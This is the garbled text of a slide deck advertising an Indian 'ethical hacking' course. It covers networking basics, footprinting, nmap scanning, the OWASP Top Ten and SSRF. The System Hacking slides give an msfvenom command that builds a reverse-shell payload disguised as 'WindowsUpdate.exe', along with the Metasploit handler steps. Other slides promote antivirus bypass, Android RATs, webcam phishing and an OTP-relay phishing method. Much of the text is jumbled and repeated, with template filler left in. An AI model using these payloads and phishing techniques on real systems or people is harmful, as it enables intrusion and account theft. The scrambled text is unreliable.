DROP CERTIFIED SECURITY COURSE

W W W . D R O P . O R G . I N
COURSE FEATURES
4 Months Live Classes
Premium Software Support
ISO Certified Certificate (Hardcopy)
Internship as per eligibility
 JOB OPPORTUNITIES
Cybersecurity Analyst
Information Security Manager
Penetration Tester
Digital Forensics Investigator
Cybersecurity Consultant
Network Security Engineer
Cloud Security Engineer
Visit Us :- Drop.org.in
Call Us :- +91 8918100300
 HOW TO PREPARE FOR THIS FIELD ?
Education and Certifications Technical Skills Hands-On Experience
Bachelor's Degree Programming Internships
Certifications Networking Personal Projects
Operating Systems Hackathons
Security Tools

Stay Updated Develop Soft Skills

Continuous Learning Problem-Solving
Networking Communication
Ethical Considerations
Visit Us :- Drop.org.in
Call Us :- +91 8918100300
SUPPORT TEAM
Dear Hacker,
if you require any type of Support in field of Hacking ,
Give us a small chance to help you in
Reply Within 24 Hours
E-mail :- [email protected]
Whatsapp Number :- +917384410454 (Whatsapp Only)
CONTACT US
+91 8918100300

www.drop.org.in

[email protected]

Electric Office, Ukhra, Durgapur, West Bengal 713363

Our Social Media :-

 TOPICS WE COVERED
Introduction to Ethical Hacking
Fundamentals of Ethical Hacking
Starting Out In Cyber Sec
Networking
Introductory Networking
OSI Model, CIA Model, Network
Hardware Hacking Tools
Surface Web, Deep Web and Dark Web
Web Fundamentals
Network Security
Fundamentals of Linux
Foot printing and Information Gathering
Scanning Networks
Hundreds of satisfied Learners are already System Hacking
touching height and earning much more than
they expected. If you are willing to kickstart your Android Device Hacking
career in the field of cyber security you are in the
right place!
 TOPICS WE COVERED
Linux VPS Installation on Windows & Android
Hacking Wireless Networks
Image Forensics Analysis
Vulnerability Analysis
POC | Proof of Concept | Piece of Code
WEB PENETRATION Testing
Server-Side Request Forgery
Business logic Vulnerabilities
Cross Site Scripting (XSS)
Insecure Direct Object Reference (IDOR)
(FPD) Full Path Disclosure
FTP Exploit Reverse Shell
VPN (Virtual Private Network)

We Are The Right Place To Start Your Career In

Anonymous Identity
the Field of Cyber Security / Ethical Hacking Web RTC Real-Time Communication
Identity System
Location Tracking
 INTRODUCTION TO ETHICAL HACKING
Networking
Linux OS Networking is the exchange of
Linux is a family of open-source Unix- information and ideas among people
like operating systems based on the with a common profession or special
Linux kernel, an operating system interest, usually in an informal social
kernel first released on September 17, Type of hackers setting.
1991, by Linus Torvalds. Linux is
Types of Hackers with ethical hacking
Ethical Hacking
typically packaged in a Linux A white hat is an ethical computer
tutorial, hackers, introduction, hacking,
distribution. hacker, or a computer security expert,
types of hackers, famous hackers,
environmental setup, network who specializes in penetration testing
penetration testing ... and other testing methodologies that
ensure the security of an organization's
information systems.

What is Ethical Hacking What is Bug Bounty Black Hat Hacker

Ethical hackers use their knowledge to secure and A bug bounty program is a deal offered by many A black hat hacker is a hacker who violates
improve the technology of organizations. They websites, organizations and software developers computer security for their own personal profit or
provide an essential service to these organizations by which individuals can receive recognition and out of malice.
by looking for vulnerabilities that can lead to a compensation for reporting bugs, especially those
security breach. pertaining to security exploits and vulnerabilities.
 FUNDAMENTALS OF ETHICAL HACKING
Information Gathering Networking Gaining Access
Information gathering is the act of A computer network is a group of The goal here is to collect enough
gathering different kinds of information computers that use a set of common information to gain access to the
against the targeted victim or system communication protocols over digital target.
interconnections for the purpose of
sharing resources located on or
provided by the network nodes

Scanning Vulnerability Exploitation

Scanning is reading a text quickly in Vulnerability refers to the inability to Exploitation is a piece of programmed
order to find specific information, e.g. withstand the effects of a hostile software or script which can allow
figures or names. It can be contrasted environment. A window of vulnerability hackers to take control over a system,
with skimming, which is reading quickly is a time frame within which defensive exploiting its vulnerability.
to get a general idea of meaning. measures are diminished,
compromised or lacking.
 STARTING OUT IN CYBER SEC
If you already have a basic idea on the different career tracks in the Industry, search the Hacktivities page for different
walkthroughs and challenges. If you want some more structured learning, check out our learning paths.

Offensive Security
The first large area within Cyber
Security is the offensive side. This area
involves attacking different
applications and technologies to
discover vulnerabilities.

Defensive Security
This is the second major area within
Security. While Offensive Security
involves actively finding vulnerabilities
and misconfigurations within
technologies, Defensive Security involves
detecting and stopping these attacks.
 NETWORKING Identifying Devices on a Network
Begin learning the fundamentals of computer Now we can change our name through deed poll,
but we can't, however, change our fingerprints.
networking in this bite -sized and interactive
Every human has an individual set of fingerprints
module. which means that even if they change their name,
there is still an identity behind it. Devices have
the same thing: two means of identification, with
one being permeable.

Ping (ICMP)
Ping is one of the most fundamental network
tools available to us. Ping uses ICMP ( Internet
Control Message Protoc ol) packets to determine
the performance of a connection between
devices, for example, if the connection exists or is
What is Networking? reliable.

A computer network is a set of computers sharing

resources located on or provided by network nodes.
The computers use common communication
What is the Internet?
protocols over digital interconnections to The Internet is one giant network that consists of
communicate with each other. many, many small networks within itself. Using our
example from the previous task, let's now imagine
that Alice made some new friends named Zayn and
Toby that she wants to introduce to Bob and Jim.
The problem is that Alice is the only person who
speaks the same language as Zayn a..
 NETWORKING Internet Protocol version 4 | IPV4
Begin learning the fundamentals of computer Internet Protocol version 4 is the fourth version
of the Internet Protocol. It is one of the core
networking in this bite -sized and interactive
protocols of standards -based internetworking
module. methods in the Internet and other packet -
switched networks. IPv4 was the first version
deployed for production on SATNET in 1982 and
on the ARPANET in January 1983.

IP Addresses
Briefly, an IP address (or Internet Protocol) address Internet Protocol version 6 | IPV6
can be used as a way of identifying a host on a Internet Protocol version 6 is the most recent
network for a period of time, where that IP address version of the Internet Protocol, the
communications protocol that provides an
can then be associated with another device without
identification and location system for computers
the IP address changing. First, let's split up precisely on networks and routes traffic across the
what an IP address is in the diagram below: Internet.

NAT :Network Address Translation MAC Addresses

Network address translation is a method of mapping A media access control address is a unique identifier
an IP address space into another by modifying assigned to a network interface controller for use as
a network address in communications within a
network address information in the IP header of
network segment. This use is common in most IEEE
packets while they are in transit across a traffic 802 networking technologies, including Ethernet, Wi
routing device. -Fi, and Bluetooth.
PORTS IN
COMPUTER
Total Number of Ports in
Networking : 65535

In computer networking, a port is a communication endpoint. At

the software level, within an operating system, a port is a logical
construct that identifies a specific process or a type of network
service. A port is identified for each transport protocol and
address combination by a 16- bit unsigned number, known as
the port number. The most common transport protocols that
use port numbers are the Transmission Control Protocol (TCP)
and the User Datagram Protocol (UDP).
 INTRODUCTORY NETWORKING
The logical follow-up to the ping command
is 'traceroute'. Traceroute can be used to
map the path your request takes as it
heads to the target machine.

At this stage, hopefully all of the theory

has made sense and you now Traceroute The OSI (Open Systems Interconnection)
Model is a standardized model which we
understand the basic models behind use to demonstrate the theory behind
computer networking. computer networking. In practice, it's
Ping | Packet The OSI actually the more compact TCP/IP model
InterNet
Groper Model that real-world networking is based off;
however the OSI model, in many ways, is
easier to get an initial understanding from.

WHOIS is a query and response The TCP/IP

WHOIS The TCP/IP model is, in many ways, very similar
protocol that is widely used for Model to the OSI model. It's a few years older, and
querying databases that store the serves as the basis for realworld networking.
registered users or assignees of an CIA Model | The TCP/IP model consists of four layers:
Internet resource, such as a domain Information Application, Transport, Internet and Network
name, an IP address block or an Interface. Between them, these cover the same
Security
autonomous system, but is also used range of functions as the seven layers of the
for a wider range of other information. OSI Model.
Confidentiality, integrity and availability, also
known as the CIA triad, is a model designed to guide
policies for information security within an
organization. The model is also sometimes referred
to as the AIC triad (availability, integrity and
confidentiality) to avoid confusion..
 OPEN SYSTEMS INTERCONNECTION (OSI) MODEL
OSI Layers Example Protocols Application Layer
The application layer of the OSI model essentially provides
networking options to programs running on a computer.
Media Layers

Presentation Layer
The presentation layer receives data from the application
layer.
Session Layer
When the session layer receives the correctly formatted
data from the presentation layer, it looks to see if it can set
up a connection with the other computer across the
network
Transport Layer
The transport layer is a very interesting layer that serves
numerous important functions. Its first purpose is to
Data Link Layer choose the protocol over which the data is to be
The data link layer focuses on the physical addressing transmitted.
of the transmission.
Network Layer
Physical Layer The network layer is responsible for locating the
The physical layer is right down to the hardware of the destination of your request. For example, the Internet is a
computer. This is where the electrical pulses that make up huge network; when you want to request information from
data transfer over a network are sent and received. a webpage,
 CIA MODEL | INFORMATION SECURITY
Confidentiality

Av
The Common Information Model is an open standard that defines

y
Integrity

rit

ail
how managed elements in an IT environment are represented as a

eg

ab
common set of objects and relationships between them.
Availability

Int

ilit
Information

y
Security

Confidentiality

Confidentiality
Integrity

Integrity
Availability

Availability
 HARDWARE HACKING TOOL
RTL-SDR IMSI Catcher
Wi-Fi Pineapple The RTL-SDR (Software Defined Radio) is a versatile and An IMSI catcher is a device used to intercept mobile phone
The Wi-Fi Pineapple is a portable device affordable radio receiver that uses the RTL2832U chipset. communications by mimicking a legitimate cell tower. It
used by security professionals to test and It enables users to tune into a wide range of radio captures the International Mobile Subscriber Identity
analyze wireless networks. It can mimic frequencies and decode various types of signals, such as (IMSI) of nearby phones, allowing the operator to monitor
legitimate Wi-Fi access points to intercept AM, FM, and digital communications. With software-based calls, texts, and sometimes even track the location of the
and assess network traffic, helping identify processing, it allows for experimentation and exploration devices. While IMSI catchers can be used for legitimate
vulnerabilities and improve security. of radio frequencies beyond traditional broadcasting, purposes by law enforcement and security agencies, they
making it popular among hobbyists and researchers. are also a potential privacy threat if misused.

Nodemcu Esp8266 Keylogger

Wi-Fi Alfa
The NodeMCU ESP8266 is a compact, low-cost The Wi-Fi Alfa refers to a series of high-performance USB A keylogger is a type of software or hardware tool
development board featuring the ESP8266 Wi-Fi Wi-Fi adapters made by Alfa Network. Known for their designed to record keystrokes made on a keyboard. It
module. It allows for easy creation of IoT robust build and strong signal reception, these adapters captures every key pressed and can track everything from
projects by providing built-in Wi-Fi connectivity are commonly used for network security testing, including typed text to passwords and other sensitive information.
and a simple programming environment based penetration testing and Wi-Fi monitoring. They often Keyloggers are often used for monitoring and security
on Lua or the Arduino IDE. Its versatility and support features like packet injection and monitor mode, purposes but can also be exploited for malicious activities
affordability make it popular for prototyping which are crucial for conducting comprehensive wireless like stealing personal data or credentials.
and building connected devices. network assessments.
 Introduction and objectives
We'll cover HTTP requests and responses, web servers,
cookies and then put them all to use in a mini Capture
the Flag at the end.

Finding the server Requests

Initially, a DNS request is made. DNS is There are 9 different HTTP "verbs", also
like a giant phone book that takes a URL known as methods. Each one has a different
(Like https://tryhackme.com/) and turns function. We've mentioned GET requests
it into an IP address. This means that already, these are used to retrieve content.
people don’t have to remember IP POST : POST requests are used to send data
addresses for their favourite websites. to a web server, like adding a comment or
performing a login.

Responses Cookies
The server should reply with a response. Cookies are small bits of data that are stored in
The response follows a similar structure your browser. Each browser will store them
to the request, but the first line describes separately, so cookies in Chrome won't be
the status rather than a verb and a path. available in Firefox. They have a huge number of
https://tryhackme.com/r/room/w The status will normally be a code, you're uses, but the most common are either session
ebfundamentals probably already familiar with 404: Not management or advertising (tracking cookies).
found. Cookies are normally sent with every HTTP request
made to a server.
 SURFACE WEB, DEEP WEB AND DARK WEB
The Surface Web
is what users access in their regular day-to-day
activity. It is available to the general public using
standard search engines and can be accessed using
standard web browsers that do not require any special
configuration, such as Mozilla Firefox, Microsoft’s
Internet Explorer or Edge, and Google Chrome.
The Deep Web
Get a modern PowerPoint Presentation that is
beautifully designed. I hope and I believe that this
Template will your Time, Money and Reputation.

The Dark Web

is a less accessible subset of the Deep Web that relies on connections
made between trusted peers and requires specialized software, tools,
or equipment to access. Two popular tools for this are Tor and I2P.
These tools are commonly known for providing user anonymity. Once
logged into Tor or I2P the most direct way to find pages on the Dark
Web is to receive a link to the page from someone who already knows
about the page. The Dark Web is well known due to media reporting
on illicit activity that occurs there.
 VPN (VIRTUAL PRIVATE NETWORK)
How To Work A VPN stands for “virtual private
network.” It’s a digital tool that

60%
redirects your internet traffic
through a secure tunnel, hiding your
IP address and encrypting your data
in the process. It’s how a VPN keeps
your data private and protects you
from potential cyberattacks
How does it work? When you connect to a VPN service, it
authenticates your client with a VPN server and applies an encryption
protocol to all your internet data. The VPN service then creates an
encrypted “tunnel” over the internet. That secures the data traveling
between you and your destination.

Safe Anonymous

What should a good VPN do?

Encryption of your IP address
70% 30% Encryption of protocols
Two-factor authentication
 INTRUSION DETECTION SYSTEM (IDS)
Firewall Intrusion Detection System (IDS)
Honeypots An intrusion detection system is a passive
monitoring solution for detecting cybersecurity
Intrusion Prevention threats to an organization. If a potential
System (IPS) intrusion is detected, the IDS generates an alert
that notifies security personnel to investigate
firewall the incident and take remediative action.

LAN WAN Firewall

In computing, a firewall is a network security
system that monitors and controls incoming
and outgoing network traffic based on
predetermined security rules. A firewall
typically establishes a barrier between a
Intrusion Prevention System (IPS) trusted network and an untrusted network,
such as the Internet.
An intrusion prevention system (IPS) is
an active protection system. Like the
IDS, it attempts to identify potential Honeypots
threats based upon monitoring In computer terminology, a honeypot is a
features of a protected host or network computer security mechanism set to detect,
and can use signature, anomaly, or deflect, or, in some manner, counteract
hybrid detection methods attempts at unauthorized use of information
systems.
 HONEYPOTS SETUP
Network Security
Detection Hacking Attack
In computer terminology, a honeypot is
a computer security mechanism set to
detect, deflect, or, in some manner,
counteract attempts at unauthorized
use of information systems.

Pentbox 1.8 | Github

 FUNDAMENTALS OF LINUX
Open Source OS
Linux Hacker’s Linux :
Penetration
Kali Linux
Testing OS
Parrot Security
Linux is a family of open-source
Unix-like operating systems
Backbox Linux
based on the Linux kernel, an
operating system kernel first
released on September 17, 1991,
by Linus Torvalds. Linux is
typically packaged in a Linux
distribution.
 LINUX INSTALLATION & SETUP IN WINDOWS
Installing Linux on VirtualBox is a
common way to run a Linux operating
system on your Windows, MacOS, or
Linux host machine. VirtualBox is a free
and open-source virtualization
software that allows you to create
virtual machines (VMs) and run various
operating systems within them. Here's
a step by step guide on how to install
Linux on virtualBox
 GOOGLE CLOUD LINUX VPS FOR ANDROID
Google Cloud offers a wide range of
virtual private server (VPS) solution
using the Linux operating systems as
one of the available options. Google
Cloud provides a flexible and scalable
infrastructure for hosting Linux-based
virtual servers, commonly referred to
as Google Computer Engine instances.
Here's an overview of how you can set-
up a Linux-based VPS on Google Cloud
 FOOT PRINTING AND INFORMATION
GATHERING
There are two types of Foot printing that can be used: active Foot printing and passive Foot printing.
Active Foot printing is the process of using tools and techniques, such as performing a ping sweep or
using the traceroute command, to gather information on a target.

Active Footprinting Passive Footprinting

Active footprinting means to Passive foot printing means
perform footprinting by getting in collecting information of a system
direct touch with the target located at a remote distance from
machine. the attacker.
 FOOT PRINTING AND INFORMATION GATHERING
Whois Look Wappalyzer Arp Protocol
WHOIS is a query and response protocol Identify web technologies Wappalyzer is The Address Resolution Protocol is a
that is widely used for querying a technology profiler that shows you communication protocol used for
databases that store the registered users what websites are built with. Find out discovering the link layer address, such as
or assignees of an Internet resource, such what CMS a website is using, as well as a MAC address, associated with a given
as a domain name, an IP address block or any framework, ecommerce platform, internet layer address, typically an IPv4
an autonomous system, but is also used JavaScript libraries and many more. address. This mapping is a critical
for a wider range of other information. function in the Internet protocol suite.

Eaves Wayback
Whois Look Wappalyzer Arp Protocol
-dropping Machine Shodan

Eavesdropping Wayback Machine Shodan

Eavesdropping is the act of secretly or The Wayback Machine is a digital archive Shodan is a search engine that lets the
stealthily listening to the private of the World Wide Web, founded by the user find specific types of computers
conversation or communications of Internet Archive, a nonprofit library connected to the internet using a variety
others without their consent in order to based in San Francisco. It allows the user of filters. Some have also described it as a
gather information. to go “back in time” and see what search engine of service banners, which
websites looked like in the past are metadata that the server sends back
to the client.
 FOOT PRINTING AND INFORMATION GATHERING
Subdomain Enumeration Tracert CMS Enumeration
Subdomain enumeration is the process of In computing, traceroute and tracert are CMSmap is a python open source CMS
finding valid (resolvable) subdomains for computer network diagnostic commands scanner that automates the process of
one or more domain(s). Unless the DNS for displaying possible routes and detecting security flaws of the most
server exposes a full DNS zone (via AFXR), it measuring transit delays of packets popular CMSs. The main purpose of
is really hard to obtain a list of existing across an Internet Protocol network. CMSmap is to integrate common
subdomains. The common practice is to use vulnerabilities for different types of CMSs
a dictionary of common names, trying to in a single tool.
resolve them

Subdomain CMS Mirroring Email

Enumeration Tracert Enumeration Google Dork Websites Tracking

Tracert Google Dork Email Tracking

In computing, traceroute and tracert are Google hacking, also named Google Email tracking service that tracks email
computer network diagnostic commands dorking, is a hacker technique that uses you sent. Sends you notification when
for displaying possible routes and Google Search and other Google email gets opened, find out when & where
measuring transit delays of packets applications to find security holes in the recipients read your emails.
across an Internet Protocol network. configuration and computer code that
websites are using.
 GOOGLE DORK
intitle: which finds strings in the title of a page filetype:which finds specific types of files (doc, pdf, mp3 etc)

allintext:which finds all terms in the title of a page

1 9 link:which searches for all links to a site or URL

2 8
inurl:which finds strings in the URL of a page cache:which displays Google’s cached copy of a page
3 7
4 6
5
site:which restricts a search to a particular site or domain Simple PowerPoint Presentation

info:which displays summary information about a page

Exploit-DB
IMAGE FORENSICS ANALYSIS
Digital
Forensic
Image
Analysis

Digital Forensic Image

Analysis
Digital forensic imaging is defined as the processes and tools
used in copying a physical storage device for conducting
investigations and gathering evidence. ... The image is an
identical copy of all the drive structures and contents.
 SCANNING NETWORKS
Network scanning helps to detect all the active hosts on a network and maps them to their IP
addresses. Network scanners send a packet or ping to every possible IP address and wait for a
response to determine the status of the applications or devices (hosts)

Types of Network Scanning

Port scanning A port scanner is an application designed to probe a server or host for open ports. Such
an application may be used by administrators to verify security policies of their networks
and by attackers to identify network services running on a host and exploit
vulnerabilities.

Network scanning Network scanning refers to the use of a computer network to gather information
regarding computing systems. Network scanning is mainly used for security assessment,
system maintenance, and also for performing attacks by hackers. ... Recognize filtering
systems between the user and the targeted hosts.

Nmap Scanner Nmap is a free and open-source network scanner created by Gordon Lyon. Nmap is used
to discover hosts and services on a computer network by sending packets and analyzing
the responses. Nmap provides a number of features for probing computer networks,
including host discovery and service and operating system detection.
 NMAP: THE NETWORK MAPPER SECURITY SCANNER
Nmap provides a number of features for probing computer networks, including host discovery and
service and operating system detection.

Nmap Posts Scanning Nmap Aggressive Scanning

Open-source Network A port scanner is an application Nmap has an aggressive mode
Scanner Created by designed to probe a server or host
for open ports. attackers to
that enables OS detection, version
detection, script scanning, and
Gordon Lyon identify network services
running on a host and exploit
traceroute. You can use the -A
argument to perform an
vulnerabilities. aggressive scan.
nmap -p-drop.org.in Nmap -A drop.org.in

Nmap Version Scanning Nmap OS Scanning

Detecting Service and Application OS scanning is one of the most
Versions By default, Nmap powerful features of Nmap.
identifies open ports on the target information on the OS (and
host and correlates those port version) of a host.
numbers with common services nmap -O drop.org.in
associated with those ports,
nmap -sV drop.org.in

Nmap Firewall bypass Nmap Timing Template to level 5

nmap -Pn drop.org.in While the fine-grained timing controls
discussed in the previous section are
powerful and effective, some people
find them confusing.
nmap –T5 drop.org.in
 NMAP: THE NETWORK MAPPER SECURITY SCANNER
Nmap provides a number of features for probing computer networks, including host discovery and
service and operating system detection.

Enumerates directories used by Attempts to enumerate DNS

Open-source Network popular web applications and
servers
hostnames by brute force
guessing of common subdomains.
Scanner Created by nmap -p 80 --script http-enum.nse With the dns-brute.srv argument,

Gordon Lyon Cross-Site Request Forgery (CSRF)

dns-brute will also try to
enumerate common DNS SRV
vulnerabilities are detected by records.
this script. nmap --script dns-brute
nmap -sV --script http-csrf
Nmap script vuln is the one we’ll
NSE Libraries be using to launch our next scan
https://nmap.org/nsedoc/lib/ against vulnerable subdomains.
The syntax is the same as that of
the previous NSE scripts, with
Finding Vulnerable PHP versions 'vuln' added after '--script', as you
nmap -sV --script=http- can see here:
phpversion nmap -Pn --script vuln

It then proceeds to combine crafted

SQL commands with susceptible URLs
in order to obtain errors. The errors
are analysed to see if the URL is
vulnerable to attack.
nmap -sV --script http-sql-injection
TRAINING FOR HACKER’S PENDRIVE
For better performance, students
need all types of Cyber security &
Ethical hacking software. Get 125+
Premium software & Tools
Pendrive free with DCSC course.
So that you can learn ethical
hacking easily
 SYSTEM HACKING
Windows Defender Bypass Windows Remote Hacking (RAT)
Microsoft Defender Antivirus is an The Remote Access Trojan (RAT)
antimalware component of Microsoft can almost be considered the
Windows. It was first released as a “legacy” tool of hackers. The RAT

W em k )
pa de s
By fendow

in o in
ss r

R
downloadable free anti-spyware is a malware program that uses a

do te g
H (RA
ac T
program for Windows XP, and was later back door for administrative

De in

w
s
W
shipped with Windows Vista and control over the targeted
Windows 7 computer.

ExSpo
MSFVenom om te of
File Extension Spoofer
n
MSFvenom is a penetration testing tool Ve Fi nsi er
F le on
that can be used to generate malicious S More advanced users know that to run
M
code, or payloads, for a variety of an exe in Windows its necessary to use
platforms. It is a combination of two the file extension “.exe”. If a malware
older tools, msfpayload and msfencode, developer wanted to distribute a file
and it offers a number of advantages that was still executable but looked
over its predecessors. like a pdf it would still have to be
called something
SYSTEM HACKING Windows Defender Bypass Windows Defender Bypass
Microsoft Defender Antivirus is an Microsoft Defender Antivirus is an
antimalware component of Microsoft antimalware component of Microsoft
Windows. It was first released as a Windows. It was first released as a
downloadable free anti-spyware downloadable free anti-spyware
Windows Defender Bypass program for Windows XP, and was later program for Windows XP, and was later
shipped with Windows Vista and shipped with Windows Vista and
Windows 7 Windows 7

Windows Remote Hacking (RAT) Windows Defender Bypass Windows Defender Bypass
Microsoft Defender Antivirus is an Microsoft Defender Antivirus is an
antimalware component of Microsoft antimalware component of Microsoft
Windows. It was first released as a Windows. It was first released as a
downloadable free anti-spyware downloadable free anti-spyware
MSFVenom program for Windows XP, and was later program for Windows XP, and was later
shipped with Windows Vista and shipped with Windows Vista and
Windows 7 Windows 7

Silent Exploit
File Extension Spoofer There are multiple Exploit DOC in
Silent DOC Exploit, a package
commonly used by web services to
process Exploit DOC File. One of the
vulnerabilities can lead to remote
Silent Exploit code execution (RCE) if..
 Create Payload
msfvenom -p windows/meterpreter/reverse_tcp --platform
windows -a x86 -f exe LHOST=192.168.13.149 LPORT=4444 -o
~/Desktop/WindowsUpdate.exe

Exploit
➢ msfconsole
➢ use Multi/handler
➢ use 5
➢ set payload windows/meterpreter/reverse_tcp
➢ set LHOST 192.168.13.149
➢ set LPORT 4444
➢ exploit

MSFVenom
MSFvenom is a penetration testing tool that can be used to generate malicious code, or
payloads, for a variety of platforms. It is a combination of two older tools, msfpayload
and msfencode, and it offers a number of advantages over its predecessors.

One of the biggest advantages of MSFvenom is that it is a single tool that can be used to
generate payloads for a wide range of platforms. This makes it much easier for
penetration testers to have the right tools at their disposal, and it also reduces the risk
of making mistakes.
SYSTEM HACKING Bypass Windows Login Password Cookie Stealing Attack
Cookie stealing attacks are a type of
Reset Administrator & User
cyberattack that involves stealing a user's
Passwords on Any Windows cookies, which are small files that
without Reformatting or websites use to identify and track users.
Bypass Windows Login Password Reinstalling System. 100%
Cookies can contain sensitive
information, such as a user's login
Success Rate! credentials, which can be used to gain
unauthorized access to a user's account.

Cookie Stealing Attack USB To System Hacking CamPhish

Hacker Hack System Data CamPhish is techniques to take cam
shots of target's phone fornt camera
Using usb Device
or PC webcam. CamPhish Hosts a
fake website on in built PHP server
USB To System Hacking and uses ngrok & serveo to generate
a link which we ..

AdvPhishing
CamPhish When victim enter his credentials,
you need to go to original website
and use those credentials to send
real OTP to victim. Once he enter
that OTP such OTP will also be there
AdvPhishing ..
 ANDROID HACKING
Remote Access Trojan
The Remote Access Trojan (RAT) can
almost be considered the "legacy" tool
of hackers. The RAT is a malware
program that uses a back door for
administrative control over the
targeted computer.
Spynote black edition 7.0
 HACKING WIRELESS NETWORKS
What Is WPS WIFI Hacking WIFI NETCUT | Network Hacking
Wi-Fi Protected Setup (WPS) is a WIFI Hacking Using WPS Security you Netcut, invented by arcai.com, is a
feature supplied with many routers. can use to find out if your access tool that protects and manages your
It is designed to make the process of point is vulnerable to WPS protocol. private network. This tool works by
connecting to a secure wireless As usual, the application lets you tracking and manipulating the MAC
network from a computer or other carry out this check on any network, Addresses that are connected to the
device easier. but it’s recommended to use it network.
exclusively on your own.

WIFI Jamming | WIFI DOS WiFi Hacking | WIFI Phishing

blocking or interference with wireless Wifiphisher is a rogue Access Point
communications. In some cases jammers framework for conducting red team
work by the transmission of radio signals engagements or Wi-Fi security
that disrupt communications by testing.
decreasing the signal-to-noise ratio. The
concept can be used in wireless data
networks to disrupt information flow.
 VULNERABILITY ANALYSIS
WpScan
WPScan is an open source WordPress security scanner. You can
use it to scan your WordPress website WpScan
Nikto Web Server Scanner
Nikto is a free software command-line vulnerability scanner that Nikto Web Server Scanner
scans webservers for dangerous files/CGIs, outdated server
software and other problems. It performs generic and server type
Nmap Security Scanner
specific checks. It also captures and prints any cookies received.

Nmap Security Scanner

Vega Vulnerability Scanner
Nmap is a free and open-source network scanner created by Gordon
Lyon. Nmap is used to discover hosts and services on a computer
network by sending packets and analyzing the responses. Nmap Acunetix Web
provides a number of features for probing computer networks, Vulnerability Scanner
including host discovery and service and operating system detection.
OWASP Zed Scanner
Vega Vulnerability Scanner
Vega is a free and open source web security scanner and web security
testing platform to test the security of web applications. Vega can Burp Suite Scanner
help you find and validate SQL Injection, Cross-Site Scripting (XSS),
inadvertently disclosed sensitive information, and other
vulnerabilities. It is written in Java, GUI based, and runs on Linux, OS
X, and Windows.
 VULNERABILITY ANALYSIS
WpScan
Acunetix Web Vulnerability Scanner
Acunetix is an application security testing solution for securing Nikto Web Server Scanner
your websites, web applications, and APIs

OWASP Zed Scanner Nmap Security Scanner

OWASP ZAP is an open-source web application security scanner.
It is intended to be used by both those new to application
Vega Vulnerability Scanner
security as well as professional penetration testers. It is one of
the most active Open Web Application Security Project projects
and has been given Flagship status. Acunetix Web
Vulnerability Scanner
Burp Suite Scanner
Burp Scanner automates the task of scanning web sites for content OWASP Zed Scanner
and vulnerabilities.

Burp Suite Scanner

WEBSITE HACKING
Cross-site scripting is a type of security
vulnerability typically found in web applications.
XSS attacks enable attackers to inject client-side
scripts into web pages viewed by other users. A
cross-site scripting vulnerability may be used by
attackers to bypass access controls such as the
same-origin policy.

Cross site request forgery (CSRF), also known

as XSRF, Sea Surf or Session Riding, is an
attack vector that tricks a web browser into
Cross-Site
executing an unwanted action in an
application to which a user is logged in. A
Scripting Command injection is a cyber attack that

successful CSRF attack can be devastating

(XSS) involves executing arbitrary commands on a
Cross site host operating system (OS). Typically, the
for both the business and user.
request Command threat actor injects the commands by
forgery Injection exploiting an application vulnerability, such
(CSRF) as insufficient input validation.

SQL injection is a code injection

technique used to attack data- SQL Server-side In this section, we'll explain what
Injection request server-side request forgery is,
driven applications, in which forgery
malicious SQL statements are describe some common examples,
(SSRF)
inserted into an entry field for and explain how to find and exploit
execution. various kinds of SSRF
vulnerabilities.

Clickjacking Brute Force

Clickjacking is a malicious technique of tricking In cryptography, a brute-force attack consists

a user into clicking on something different from of an attacker submitting many passwords or
what the user perceives, thus potentially passphrases with the hope of eventually
revealing confidential information or allowing guessing correctly. The attacker systematically
others to take control of their computer while checks all possible passwords and passphrases
clicking on seemingly innocuous objects, until the correct one is found.
including web pages.
 WEB PENETRATION TESTING
Firewall
In computing, a firewall is a network

1
security system that monitors and
Firewall controls incoming and outgoing network
traffic based on predetermined security
rules. A firewall typically establishes a
barrier between a trusted network and an

2
untrusted network, such as the Internet.
Use HTTPS
Use HTTPS
WEB As a consumer, you may already know to
PENETRATION always look for the green lock image and
Testing https in your browser bar any time you
Up-To-Date provide sensitive information to a
3 Up-To-Date Using a CMS with various useful plugins website.
and extensions offers a lot of benefits, but
it also brings risk. The leading cause of
website infections is vulnerabilities in a

4
content management system’s extensible
Don’t help
components.
the hackers
Don’t help the hackers
look out for phishing emails and
other scams.
 Broken Access Control
moves up from the fifth position; 94% of applications were tested
for some form of broken access control. The 34 Common
Weakness Enumerations (CWEs) mapped to Broken Access Control
had more occurrences in applications than any other category.

Cryptographic Failures

OWASP TOP TEN

shifts up one position to #2, previously known as Sensitive Data
Exposure, which was broad symptom rather than a root cause. The
renewed focus here is on failures related to cryptography which
often leads to sensitive data exposure or system compromise.

The OWASP (Open Web Application Security Project) Injection

Top Ten is a list of the most critical security risks to slides down to the third position. 94% of the applications were
tested for some form of injection, and the 33 CWEs mapped into
web applications. It's essential for developers and this category have the second most occurrences in applications.
security professionals to understand these risks and Cross-site Scripting is now part of this category in this edition.

how to mitigate them to build secure web applications.

Here's a brief tutorial covering each of the OWASP Top Insecure Design
is a new category for 2021, with a focus on risks related to design
Ten: flaws. If we genuinely want to “move left” as an industry, it calls
for more use of threat modeling, secure design patterns and
principles, and reference architectures.

Security Misconfiguration
moves up from #6 in the previous edition; 90% of applications
were tested for some form of misconfiguration. With more shifts
into highly configurable software, it’s not surprising to see this
category move up. The former category for XML External Entities
(XXE) is now part of this category.
 Vulnerable and Outdated Components
was previously titled Using Components with Known
Vulnerabilities and is #2 in the Top 10 community survey, but also
had enough data to make the Top 10 via data analysis. This
category moves up from #9 in 2017 and is a known issue that we
struggle to test and assess …

Identification and Authentication Failures

OWASP TOP TEN

was previously Broken Authentication and is sliding down from
the second position, and now includes CWEs that are more related
to identification failures. This category is still an integral part of
the Top 10, but the increased availability of standardized
frameworks seems to be helping.

The OWASP (Open Web Application Security Project) Software and Data Integrity Failures
Top Ten is a list of the most critical security risks to is a new category for 2021, focusing on making
web applications. It's essential for developers and assumptions related to software updates, critical data,
and CI/CD pipelines without verifying integrity. One of
security professionals to understand these risks and the highest
how to mitigate them to build secure web applications.
Here's a brief tutorial covering each of the OWASP Top
Security Logging and Monitoring Failures
was previously Insufficient Logging & Monitoring and is
Ten:
added from the industry survey (#3), moving up from
#10 previously. This category is expanded to include

Server-Side Request Forgery

is added from the Top 10 community survey (#1). The
data shows a relatively low incidence rate with above
average testing coverage, along with above-average
ratings for
 Basic SSRF against the local server
Why do applications behave in this way, and implicitly
trust requests that come from the local machine? This

SERVER-SIDE can arise for various reasons:

Basic SSRF against another back-end system

REQUEST FORGERY
